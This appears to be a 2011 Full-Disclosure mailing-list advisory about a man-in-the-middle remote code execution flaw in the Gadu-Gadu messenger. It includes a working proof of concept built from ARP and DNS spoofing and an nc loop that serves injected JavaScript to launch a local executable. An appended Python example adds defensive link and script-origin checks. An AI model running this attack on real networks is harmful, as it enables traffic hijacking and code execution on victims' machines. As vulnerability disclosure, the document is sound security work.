Message-ID: <BANLkTi=T-AhaH1c2RdaFLsxQAGJjiDRJ5g@mail.gmail.com>
Date: Sat, 28 May 2011 14:45:58 +0200
From: Kacper Szczesniak <kacper@....pl>
To: full-disclosure@...ts.grok.org.uk
Subject: Gadu-Gadu 0-Day MITM, Remote Code Execution

Vendor: Gadu-Gadu (http://gadu-gadu.pl)
Vulnerable Version: All
Vulnerability Type: MITM, Remote Code Execution
Risk level: High
Credit: Kacper Szczesniak <kacper3.14@...il.com>

Vulnerability Details:

Gadu-Gadu is vulnerable to a Man-In-The-Middle attack allowing remote code execution on a victim host. JavaScript code is loaded from an external HTTP location to display ads. If an attacker is able to take over the HTTP request, it is possible to inject JS code into the WebKit User Interface. Internal communication mechanisms can be used to spawn new processes. No user interaction or contact list presence is needed, as ads are loaded automatically.

A trivial PoC to spawn notepads all over CoffeeHeaven/LAN:

# echo 1 > /proc/sys/net/ipv4/ip_forward
# arp -s GW_IP GW_MAC
# arpspoof -i eth0 GW_IP
# echo "YOURIP *.adocean.pl" > /tmp/x
# dnsspoof -i eth0 -f /tmp/x
# while [ 1 ] ; do echo -ne "HTTP/1.0 200 OK\r\nConnection: close\r\nContent-Length: 239\r\nContent-Type: text/html\r\n\r\nb=document.getElementsByTagName(\"body\").item(0);\r\nb.innerHTML='<a id=\"a\" href=\"c:/windows/notepad.exe\"></a>';\r\na=document.getElementById('a');\r\ne=document.createEvent('HTMLEvents');\r\ne.initEvent('click', true, true);\r\na.dispatchEvent(e);\r\n" | nc -l 80 ; done

BTW, the last vulnerability was not really patched. Only a message filter was introduced, so it's still possible to take advantage of it using another MITM.

kacper

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
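The root cause described above is a host-side link handler that will launch whatever href the ad JavaScript puts in the page, combined with ad script fetched over plain HTTP. As an added example (not the author's PoC and not Gadu-Gadu's code), the following shows the two checks a host application can put in front of that path: an allow-list on link schemes before anything is handed to the OS, and a requirement that ad script only be fetched over TLS from a pinned origin. All function names and the origin value are assumptions.

```python
from urllib.parse import urlparse

# Hypothetical policy for an embedded-browser (WebKit) UI.  The names and the
# pinned origin below are constructed for this example, not a real vendor API.
ALLOWED_LINK_SCHEMES = {"http", "https", "mailto"}
ALLOWED_SCRIPT_ORIGINS = {"https://ads.example.invalid"}  # constructed placeholder


def is_safe_link(href: str) -> bool:
    """Allow only network URLs with an explicit, allow-listed scheme.

    A Windows path such as 'c:/windows/notepad.exe' parses with scheme 'c',
    so an allow-list of schemes (rather than a deny-list of 'file') is what
    stops a synthetic click from launching a local executable.
    """
    try:
        u = urlparse(href.strip())
    except ValueError:
        return False
    scheme = u.scheme.lower()
    if scheme not in ALLOWED_LINK_SCHEMES:
        return False
    # 'http:notepad.exe' has the right scheme but no host: still reject it.
    if scheme in ("http", "https") and not u.netloc:
        return False
    return True


def is_allowed_script_source(src: str) -> bool:
    """Fetch ad script only over TLS from a pinned origin.

    Plain HTTP lets a LAN attacker with ARP/DNS spoofing substitute the
    script body; TLS with a fixed origin removes that substitution point.
    """
    u = urlparse(src.strip())
    if u.scheme.lower() != "https" or not u.netloc:
        return False
    return f"https://{u.netloc.lower()}" in ALLOWED_SCRIPT_ORIGINS


def handle_click(href: str, launch) -> bool:
    """Gate the host's 'open link' handler; return whether the link was opened."""
    if not is_safe_link(href):
        return False
    launch(href)
    return True
```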